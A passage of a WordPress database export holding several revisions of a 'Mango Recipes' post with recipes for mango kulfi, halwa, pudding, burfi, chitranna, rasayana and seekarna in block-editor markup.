-->\n\n<!-- wp:paragraph -->\n<p>Indian mango kulfi is a instant dessert that is made with condensed milk, mango pulp and cream.<br>For best results follow my detailed step-by-step photo instructions and tips.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>INGREDIENTS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>1 ½ cup mango pieces, cubed (use sweet mango)(1 medium)</li><li>½ tin sweetened  condensed milk(milkmaid)</li><li>200 ml  whipping cream or 250 ml cream(chilled)</li><li>1/4 tablespoon elaichi (cardamom powder)</li><li>1 pinch kesar (saffron) (optional for color)</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p><strong>INSTRUCTIONS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Soak kesar or saffron in 2 tablespoon hot water. This is optional.</li><li>Wash and peel mango. Chop them to cubes and add to a blender jar.</li><li>Add chilled cream, saffron, condensed milk and cardamom powder to the jar.</li><li>Blend on a medium speed until smooth.</li><li>Add chopped pistas. Give a good stir.</li><li>Pour the mixture to the kulfi moulds and refrigerate until set.</li><li>Rub the moulds in between your palm or dip them in a bowl of water.</li><li>Gently loosen and remove mango kulfi.</li><li>Garnish with crushed pista. Serve with love.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph {\"align\":\"left\"} -->\n<p class=\"has-text-align-left\"><strong>MANGO HALWA RECIPE</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Preparation Time :15 Mins</li><li>Cook Time           :45 Mints</li><li>Makes                  :4-5 Perfect Squares &amp; Some Small Pieces</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p><strong>INGREDIENTS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>2 and 3/4 cups Mango Pulp</li><li>1 tablespoon Ghee</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p><strong>INSTRUCTIONS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>In a heavy bottom vessel add the ghee and when it is hot add the mango pulp.</li><li>Keep stirring the mixture every 10-15 minutes so that it does not stick to the vessel.</li><li>The mixture will reduce in quantity, there will be a change in color and after 45 minutes transfer this mixture to a greased (with very little ghee) plate. I used 2 and 3/4 cups of pulp and it cooked down to 3/4ths of a cup approximately. So a very small plate is enough.</li><li>Left the plate undisturbed for one more hour and then cut it into pieces.</li><li>Garnish it with nuts of your choice.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->','Mango Recipes','','inherit','closed','closed','','745-revision-v1','','','2022-02-07 16:36:23','2022-02-07 11:06:23','',745,'https://mangomitra.in/?p=803',0,'revision','',0),(805,1,'2022-02-07 16:51:47','2022-02-07 11:21:47','<!-- wp:group -->\n<div class=\"wp-block-group\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:heading -->\n<h2 id=\"mango-pudding-recipe\"><strong>MANGO PUDDING RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Preparation Time  : 4 hours</li><li>Cook Time            :15 minutes</li><li>Total Time             : 4 hours 15 minutes</li><li>Servings                : 3 Servings</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p><strong>INGREDIENTS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>1 tsp agar-agar / gelatin / china grass</li><li>2 tbsp hot water</li><li>2 cups mango puree</li><li>for cream layer:</li><li>1 cup milk full cream</li><li>1 tsp agar-agar / gelatin</li><li>½ cup sugar powdered</li><li>1 cup cream</li><li>1 tsp vanilla extract / vanilla essence</li><li>pinch of salt</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p><strong>INSTRUCTIONS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Firstly, in a large mixing bowl take 1 tablespoon of agar-agar / gelatin and add 2 tablespoon hot water. Mix well and dissolve agar-agar completely.</li><li>Further add 2 cups of mango puree. Mix well making sure the pulp gets mixed up with agar-agar uniformly.</li><li>Furthermore, place the serving glass in a bowl so that it gets tilted slightly. Pour in prepared mango mixture till it reaches the rim.</li><li>Now refrigerate it for 2 hours or overnight, till it sets completely. After 2 hours, make sure to check the mango has set completely.</li><li>Now prepare cream layer by heating up milk.</li><li>Add in 1 tablespoon agar-agar / gelatin and whisk well.</li><li>Cook the milk on medium-low heat till it steams (do not boil).</li><li>Further add 1 cup cream and whisk well. Additionally add ½ cup powdered sugar, 1 tablespoon vanilla extract and pinch of salt. Whisk and dissolve the sugar completely.</li><li>Let the milk cool for 10 minutes before pouring to the glass.</li><li>Pour the milk into glass.</li><li>Refrigerate it for 2 hours or overnight, till it sets completely.</li><li>Finally, garnish with few chopped mangoes and enjoy mango panna cotta or mango pudding.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:heading -->\n<h2 id=\"mavinakayi-chitranna-recipe\"><strong>MAVINAKAYI CHITRANNA RECIPE </strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph {\"align\":\"left\"} -->\n<p class=\"has-text-align-left\">Mavinakayi Chitranna Recipe is a delicious preparation of rice from the raw green mangoes that you get in the summers. The tartness of the mangoes along with the green chillies and the seasonings, brings out the flavors of this classic South Indian Rice recipe.</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p>While you’re probably enjoying the beautifully luscious ripe mangoes of the season, don’t forget to enjoy your share of the raw mangoes too by trying this Mavinakayi Chitranna Recipe. Summer feels incomplete without getting enough of the tangy hit of raw mangoes, balanced by hot spices,salt, lime and the right tempering, raw mangoes are delicious in a range of preparations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Serve the Mavinakayi Chitranna along with a Tomato Onion Cucumber Raita or High-Protein Peanut Chutney and a roasted papad for lunch or even for dinner. The Mavinakayi Chitranna makes a great picnic lunch too.</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-rasayana\"><strong>MANGO RASAYANA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Cut the mangoes into small cubes and keep them in a mixing bowl.</li><li>Squeeze and extract the remaining mango juice from the mangoes.</li><li>Next add coconut milk, jaggery, and cardamom powder. Mix well. Adjust the consistency of rasayana.</li><li>Serve chilled with dosa, poori, or chapati.</li></ul>\n<!-- /wp:list --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-seekarna\"><strong>MANGO SEEKARNA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Seekarane with Holige, Poori, Dosa, chapati, or also can be eaten as it is.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Variations<br>Any variety of mangoes can be used, but try to choose sweet, juicy, and pulpy mangoes.<br>You can use white or brown sugar instead of jaggery. Adjust the jaggery based on the sweetness of the mango. I have made coconut milk at home using freshly shredded coconut but you can also use store brought coconut milk. You can also replace coconut milk with dairy milk or almond milk.</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-burfi-recipe\"><strong>MANGO BURFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 5 minutes<br>Cook Time           : 15 minutes<br>Total Time            : 20 minutes<br>Servings               : 24 pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>INGREDIENTS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>1 cup mango cubes</li><li>½ cup milk</li><li>1 cup sugar</li><li>3 cup coconut grated</li><li>¼ tablespoon cardamom powder</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p><strong>INSTRUCTONS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Firstly, in a blender take 1 cup mango and ½ cup milk.</li><li>Blend to smooth puree adding more milk if required.</li><li>Transfer the mango puree to large kadai.</li><li>Also add 1 cup sugar and mix until sugar dissolves completley.</li><li>Further add 3 cup coconut keep stirring till the mixture starts to thicken continue to cook on medium flame stirring continuously and after 15 minutes, coconut mixture will start to separate from pan.</li><li>Now add ¼ tablespoon cardamom powder and mix well.</li><li>Transfer the prepared mixture into a greased plate lined with baking paper set well forming a block and cut into pieces.</li><li>Finally, serve mango burfi / mango coconut barfi or store in airtight container for a week in the refrigerator.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-kulfi-recipe\"><strong>MANGO KULFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Indian mango kulfi is a instant dessert that is made with condensed milk, mango pulp and cream.<br>For best results follow my detailed step-by-step photo instructions and tips.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>INGREDIENTS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>1 ½ cup mango pieces, cubed (use sweet mango)(1 medium)</li><li>½ tin sweetened  condensed milk(milkmaid)</li><li>200 ml  whipping cream or 250 ml cream(chilled)</li><li>1/4 tablespoon elaichi (cardamom powder)</li><li>1 pinch kesar (saffron) (optional for color)</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p><strong>INSTRUCTIONS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Soak kesar or saffron in 2 tablespoon hot water. This is optional.</li><li>Wash and peel mango. Chop them to cubes and add to a blender jar.</li><li>Add chilled cream, saffron, condensed milk and cardamom powder to the jar.</li><li>Blend on a medium speed until smooth.</li><li>Add chopped pistas. Give a good stir.</li><li>Pour the mixture to the kulfi moulds and refrigerate until set.</li><li>Rub the moulds in between your palm or dip them in a bowl of water.</li><li>Gently loosen and remove mango kulfi.</li><li>Garnish with crushed pista. Serve with love.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-halwa-recipe\"><strong>MANGO HALWA RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Preparation Time :15 Mins</li><li>Cook Time           :45 Mints</li><li>Makes                  :4-5 Perfect Squares &amp; Some Small Pieces</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p><strong>INGREDIENTS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>2 and 3/4 cups Mango Pulp</li><li>1 tablespoon Ghee</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p><strong>INSTRUCTIONS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>In a heavy bottom vessel add the ghee and when it is hot add the mango pulp.</li><li>Keep stirring the mixture every 10-15 minutes so that it does not stick to the vessel.</li><li>The mixture will reduce in quantity, there will be a change in color and after 45 minutes transfer this mixture to a greased (with very little ghee) plate. I used 2 and 3/4 cups of pulp and it cooked down to 3/4ths of a cup approximately. So a very small plate is enough.</li><li>Left the plate undisturbed for one more hour and then cut it into pieces.</li><li>Garnish it with nuts of your choice.</li></ul>\n<!-- /wp:list --></div>\n<!-- /wp:group -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->','Mango Recipes','','inherit','closed','closed','','745-revision-v1','','','2022-02-07 16:51:47','2022-02-07 11:21:47','',745,'https://mangomitra.in/?p=805',0,'revision','',0),(807,1,'2022-02-07 16:55:23','2022-02-07 11:25:23','<!-- wp:group -->\n<div class=\"wp-block-group\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:heading -->\n<h2 id=\"mango-pudding-recipe\"><strong>MANGO PUDDING RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Preparation Time  : 4 hours</li><li>Cook Time            :15 minutes</li><li>Total Time             : 4 hours 15 minutes</li><li>Servings                : 3 Servings</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":4} -->\n<h4 id=\"ingredients\"><strong>INGREDIENTS</strong></h4>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>1 tsp agar-agar / gelatin / china grass</li><li>2 tbsp hot water</li><li>2 cups mango puree</li><li>for cream layer:</li><li>1 cup milk full cream</li><li>1 tsp agar-agar / gelatin</li><li>½ cup sugar powdered</li><li>1 cup cream</li><li>1 tsp vanilla extract / vanilla essence</li><li>pinch of salt</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p><strong>INSTRUCTIONS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Firstly, in a large mixing bowl take 1 tablespoon of agar-agar / gelatin and add 2 tablespoon hot water. Mix well and dissolve agar-agar completely.</li><li>Further add 2 cups of mango puree. Mix well making sure the pulp gets mixed up with agar-agar uniformly.</li><li>Furthermore, place the serving glass in a bowl so that it gets tilted slightly. Pour in prepared mango mixture till it reaches the rim.</li><li>Now refrigerate it for 2 hours or overnight, till it sets completely. After 2 hours, make sure to check the mango has set completely.</li><li>Now prepare cream layer by heating up milk.</li><li>Add in 1 tablespoon agar-agar / gelatin and whisk well.</li><li>Cook the milk on medium-low heat till it steams (do not boil).</li><li>Further add 1 cup cream and whisk well. Additionally add ½ cup powdered sugar, 1 tablespoon vanilla extract and pinch of salt. Whisk and dissolve the sugar completely.</li><li>Let the milk cool for 10 minutes before pouring to the glass.</li><li>Pour the milk into glass.</li><li>Refrigerate it for 2 hours or overnight, till it sets completely.</li><li>Finally, garnish with few chopped mangoes and enjoy mango panna cotta or mango pudding.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:heading -->\n<h2 id=\"mavinakayi-chitranna-recipe\"><strong>MAVINAKAYI CHITRANNA RECIPE </strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph {\"align\":\"left\"} -->\n<p class=\"has-text-align-left\">Mavinakayi Chitranna Recipe is a delicious preparation of rice from the raw green mangoes that you get in the summers. The tartness of the mangoes along with the green chillies and the seasonings, brings out the flavors of this classic South Indian Rice recipe.</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p>While you’re probably enjoying the beautifully luscious ripe mangoes of the season, don’t forget to enjoy your share of the raw mangoes too by trying this Mavinakayi Chitranna Recipe. Summer feels incomplete without getting enough of the tangy hit of raw mangoes, balanced by hot spices,salt, lime and the right tempering, raw mangoes are delicious in a range of preparations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Serve the Mavinakayi Chitranna along with a Tomato Onion Cucumber Raita or High-Protein Peanut Chutney and a roasted papad for lunch or even for dinner. The Mavinakayi Chitranna makes a great picnic lunch too.</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-rasayana\"><strong>MANGO RASAYANA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Cut the mangoes into small cubes and keep them in a mixing bowl.</li><li>Squeeze and extract the remaining mango juice from the mangoes.</li><li>Next add coconut milk, jaggery, and cardamom powder. Mix well. Adjust the consistency of rasayana.</li><li>Serve chilled with dosa, poori, or chapati.</li></ul>\n<!-- /wp:list --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-seekarna\"><strong>MANGO SEEKARNA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Seekarane with Holige, Poori, Dosa, chapati, or also can be eaten as it is.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Variations<br>Any variety of mangoes can be used, but try to choose sweet, juicy, and pulpy mangoes.<br>You can use white or brown sugar instead of jaggery. Adjust the jaggery based on the sweetness of the mango. I have made coconut milk at home using freshly shredded coconut but you can also use store brought coconut milk. You can also replace coconut milk with dairy milk or almond milk.</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-burfi-recipe\"><strong>MANGO BURFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 5 minutes<br>Cook Time           : 15 minutes<br>Total Time            : 20 minutes<br>Servings               : 24 pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>INGREDIENTS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>1 cup mango cubes</li><li>½ cup milk</li><li>1 cup sugar</li><li>3 cup coconut grated</li><li>¼ tablespoon cardamom powder</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p><strong>INSTRUCTONS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Firstly, in a blender take 1 cup mango and ½ cup milk.</li><li>Blend to smooth puree adding more milk if required.</li><li>Transfer the mango puree to large kadai.</li><li>Also add 1 cup sugar and mix until sugar dissolves completley.</li><li>Further add 3 cup coconut keep stirring till the mixture starts to thicken continue to cook on medium flame stirring continuously and after 15 minutes, coconut mixture will start to separate from pan.</li><li>Now add ¼ tablespoon cardamom powder and mix well.</li><li>Transfer the prepared mixture into a greased plate lined with baking paper set well forming a block and cut into pieces.</li><li>Finally, serve mango burfi / mango coconut barfi or store in airtight container for a week in the refrigerator.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-kulfi-recipe\"><strong>MANGO KULFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Indian mango kulfi is a instant dessert that is made with condensed milk, mango pulp and cream.<br>For best results follow my detailed step-by-step photo instructions and tips.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>INGREDIENTS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>1 ½ cup mango pieces, cubed (use sweet mango)(1 medium)</li><li>½ tin sweetened  condensed milk(milkmaid)</li><li>200 ml  whipping cream or 250 ml cream(chilled)</li><li>1/4 tablespoon elaichi (cardamom powder)</li><li>1 pinch kesar (saffron) (optional for color)</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p><strong>INSTRUCTIONS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Soak kesar or saffron in 2 tablespoon hot water. This is optional.</li><li>Wash and peel mango. Chop them to cubes and add to a blender jar.</li><li>Add chilled cream, saffron, condensed milk and cardamom powder to the jar.</li><li>Blend on a medium speed until smooth.</li><li>Add chopped pistas. Give a good stir.</li><li>Pour the mixture to the kulfi moulds and refrigerate until set.</li><li>Rub the moulds in between your palm or dip them in a bowl of water.</li><li>Gently loosen and remove mango kulfi.</li><li>Garnish with crushed pista. Serve with love.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-halwa-recipe\"><strong>MANGO HALWA RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Preparation Time :15 Mins</li><li>Cook Time           :45 Mints</li><li>Makes                  :4-5 Perfect Squares &amp; Some Small Pieces</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p><strong>INGREDIENTS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>2 and 3/4 cups Mango Pulp</li><li>1 tablespoon Ghee</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p><strong>INSTRUCTIONS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>In a heavy bottom vessel add the ghee and when it is hot add the mango pulp.</li><li>Keep stirring the mixture every 10-15 minutes so that it does not stick to the vessel.</li><li>The mixture will reduce in quantity, there will be a change in color and after 45 minutes transfer this mixture to a greased (with very little ghee) plate. I used 2 and 3/4 cups of pulp and it cooked down to 3/4ths of a cup approximately. So a very small plate is enough.</li><li>Left the plate undisturbed for one more hour and then cut it into pieces.</li><li>Garnish it with nuts of your choice.</li></ul>\n<!-- /wp:list --></div>\n<!-- /wp:group -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->','Mango Recipes','','inherit','closed','closed','','745-revision-v1','','','2022-02-07 16:55:23','2022-02-07 11:25:23','',745,'https://mangomitra.in/?p=807',0,'revision','',0),(808,1,'2022-02-07 16:56:43','2022-02-07 11:26:43','<!-- wp:group -->\n<div class=\"wp-block-group\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:heading -->\n<h2 id=\"mango-pudding-recipe\"><strong>MANGO PUDDING RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Preparation Time  : 4 hours</li><li>Cook Time            :15 minutes</li><li>Total Time             : 4 hours 15 minutes</li><li>Servings                : 3 Servings</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>1 tsp agar-agar / gelatin / china grass</li><li>2 tbsp hot water</li><li>2 cups mango puree</li><li>for cream layer:</li><li>1 cup milk full cream</li><li>1 tsp agar-agar / gelatin</li><li>½ cup sugar powdered</li><li>1 cup cream</li><li>1 tsp vanilla extract / vanilla essence</li><li>pinch of salt</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Firstly, in a large mixing bowl take 1 tablespoon of agar-agar / gelatin and add 2 tablespoon hot water. Mix well and dissolve agar-agar completely.</li><li>Further add 2 cups of mango puree. Mix well making sure the pulp gets mixed up with agar-agar uniformly.</li><li>Furthermore, place the serving glass in a bowl so that it gets tilted slightly. Pour in prepared mango mixture till it reaches the rim.</li><li>Now refrigerate it for 2 hours or overnight, till it sets completely. After 2 hours, make sure to check the mango has set completely.</li><li>Now prepare cream layer by heating up milk.</li><li>Add in 1 tablespoon agar-agar / gelatin and whisk well.</li><li>Cook the milk on medium-low heat till it steams (do not boil).</li><li>Further add 1 cup cream and whisk well. Additionally add ½ cup powdered sugar, 1 tablespoon vanilla extract and pinch of salt. Whisk and dissolve the sugar completely.</li><li>Let the milk cool for 10 minutes before pouring to the glass.</li><li>Pour the milk into glass.</li><li>Refrigerate it for 2 hours or overnight, till it sets completely.</li><li>Finally, garnish with few chopped mangoes and enjoy mango panna cotta or mango pudding.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:heading -->\n<h2 id=\"mavinakayi-chitranna-recipe\"><strong>MAVINAKAYI CHITRANNA RECIPE </strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph {\"align\":\"left\"} -->\n<p class=\"has-text-align-left\">Mavinakayi Chitranna Recipe is a delicious preparation of rice from the raw green mangoes that you get in the summers. The tartness of the mangoes along with the green chillies and the seasonings, brings out the flavors of this classic South Indian Rice recipe.</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p>While you’re probably enjoying the beautifully luscious ripe mangoes of the season, don’t forget to enjoy your share of the raw mangoes too by trying this Mavinakayi Chitranna Recipe. Summer feels incomplete without getting enough of the tangy hit of raw mangoes, balanced by hot spices,salt, lime and the right tempering, raw mangoes are delicious in a range of preparations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Serve the Mavinakayi Chitranna along with a Tomato Onion Cucumber Raita or High-Protein Peanut Chutney and a roasted papad for lunch or even for dinner. The Mavinakayi Chitranna makes a great picnic lunch too.</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-rasayana\"><strong>MANGO RASAYANA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Cut the mangoes into small cubes and keep them in a mixing bowl.</li><li>Squeeze and extract the remaining mango juice from the mangoes.</li><li>Next add coconut milk, jaggery, and cardamom powder. Mix well. Adjust the consistency of rasayana.</li><li>Serve chilled with dosa, poori, or chapati.</li></ul>\n<!-- /wp:list --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-seekarna\"><strong>MANGO SEEKARNA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Seekarane with Holige, Poori, Dosa, chapati, or also can be eaten as it is.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Variations<br>Any variety of mangoes can be used, but try to choose sweet, juicy, and pulpy mangoes.<br>You can use white or brown sugar instead of jaggery. Adjust the jaggery based on the sweetness of the mango. I have made coconut milk at home using freshly shredded coconut but you can also use store brought coconut milk. You can also replace coconut milk with dairy milk or almond milk.</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-burfi-recipe\"><strong>MANGO BURFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 5 minutes<br>Cook Time           : 15 minutes<br>Total Time            : 20 minutes<br>Servings               : 24 pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>INGREDIENTS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>1 cup mango cubes</li><li>½ cup milk</li><li>1 cup sugar</li><li>3 cup coconut grated</li><li>¼ tablespoon cardamom powder</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p><strong>INSTRUCTONS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Firstly, in a blender take 1 cup mango and ½ cup milk.</li><li>Blend to smooth puree adding more milk if required.</li><li>Transfer the mango puree to large kadai.</li><li>Also add 1 cup sugar and mix until sugar dissolves completley.</li><li>Further add 3 cup coconut keep stirring till the mixture starts to thicken continue to cook on medium flame stirring continuously and after 15 minutes, coconut mixture will start to separate from pan.</li><li>Now add ¼ tablespoon cardamom powder and mix well.</li><li>Transfer the prepared mixture into a greased plate lined with baking paper set well forming a block and cut into pieces.</li><li>Finally, serve mango burfi / mango coconut barfi or store in airtight container for a week in the refrigerator.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-kulfi-recipe\"><strong>MANGO KULFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Indian mango kulfi is a instant dessert that is made with condensed milk, mango pulp and cream.<br>For best results follow my detailed step-by-step photo instructions and tips.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>INGREDIENTS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>1 ½ cup mango pieces, cubed (use sweet mango)(1 medium)</li><li>½ tin sweetened  condensed milk(milkmaid)</li><li>200 ml  whipping cream or 250 ml cream(chilled)</li><li>1/4 tablespoon elaichi (cardamom powder)</li><li>1 pinch kesar (saffron) (optional for 